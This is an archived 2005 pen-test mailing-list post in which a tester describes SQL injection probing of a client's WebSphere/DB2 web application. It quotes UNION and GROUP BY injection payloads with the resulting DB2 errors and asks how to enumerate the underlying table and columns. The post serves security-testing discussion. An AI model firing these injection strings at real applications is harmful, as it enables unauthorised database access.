SQLInjecting DB2

From: Andres Molinetti (andymolinetti_at_hotmail.com)
Date: 02/16/05

  • Next message: John Madden: "Cryptocard database" 
    To: pen-test@securityfocus.com
Date: Wed, 16 Feb 2005 19:51:35 +0000

    Hi, I'm currently testing a Websphere/DB2 Web Application of one of our
    clients.
    I've found that it is vulnerable to SQL Injection.
    I 've also discovered that there is a table named SYSTABLES with a NAME
    column in it.

    Using the "GROUP by 1--" trick I've discovered two columns in the table over
    which the query is being executed.
    After doing "GROUP by A, B--", I get no more errors, so I asume that only
    these two columns are taking part on the query..(is that ok?)

    Column A is probaby CLOB or VARCHAR and B probably and INTEGER. (any whay to
    confirm this?)

    I can say this because I've tried this query: ' AND A=CLOB('A')--
    and it returns no error
    when this one: ' AND A=BIGINT(132123)--
    returns error on type comparison

    So then I proceeded to do a: ' UNION ALL SELECT 1 FROM SYSTABLES--
    Then I get "Error 500: java.sql.SQLException: [SQL0415] Operandos UNION no
    compatibles."

    I suppose that the column types are different.

    Anyway, I submit this query: ' UNION ALL SELECT 1,1 FROM SYSTABLES--
    Then I get "Error 500: java.sql.SQLException: [SQL0421] Número de operandos
    UNION no igual."
    Meaning that the number of columns are not equal...

    Here are my questions:
    1). Is there any way to get the "original" table name (the one where the
    original query executes)?
    2). I've done a script that checks for different column numbers and it have
    already tested with about 200 columns, and it keep saying that number of
    operands is not equal. What could be happening?

    Any ideas would be greatly appreciated!!

    Thanks, Andy

    _________________________________________________________________
    Un amor, una aventura, compañía para un viaje. Regístrate gratis en MSN Amor
    & Amistad. http://match.msn.es/match/mt.cfm?pg=channel&tcid=162349

  • Next message: John Madden: "Cryptocard database"

    Relevant Pages

    • Re: Combining records from two queries
      ... combining UNION and SELECT queries to best effect. ... The list in each case has to have the same number & types of fields (for example, if the first Query begins with a Date/Time field, the second one should do so as well). ... I like to keep my Union Queries short and simple and do the rest of the work elsewhere. ... tblMentors comprises Subject Mentors and Professional Mentors and the Placement subform has a combo for each - the Subject Mentor combo puts the chosen MentorID in the SubjectMentorID field and the Professional Mentor combo puts the chosen MentorID in the ProfessionalMentorID field. ...
      (microsoft.public.access.queries)
    • Re: Graphical Union-Query Builder?
      ... If you are limiting the input in each of the sub-queries in your Union ... Use the filtered queries as the input to your Union query: ... Most "functional IT users" will not know anything about SQL. ... I didn't know that fields of subsequent queries in a Union could have ...
      (microsoft.public.access.queries)
    • Re: Help! Union Query has started crashing!
      ... It's tblSupport on the RLR_SUPPORT_INFOTERRA.mdb database. ... I think I have tracked the problem down to the query ... I also tried a UNION ALL, ... the actual structure of the queries as they have been running fine for weeks. ...
      (microsoft.public.access.queries)
    • Re: Sum of numbers
      ... "Evi" wrote: ... You say the union query 'only shows fields from the first table'. ... Do you mean that you want a multicolumn report with all customers' names ...
      (microsoft.public.access.reports)
    • Re: How to get a distinct count of result set of multople table joins?
      ... since the UNION syntax removes duplicate rows automatically. ...   "SORT " in your execution plan. ... The base query is an outer join. ...
      (comp.databases.oracle.misc)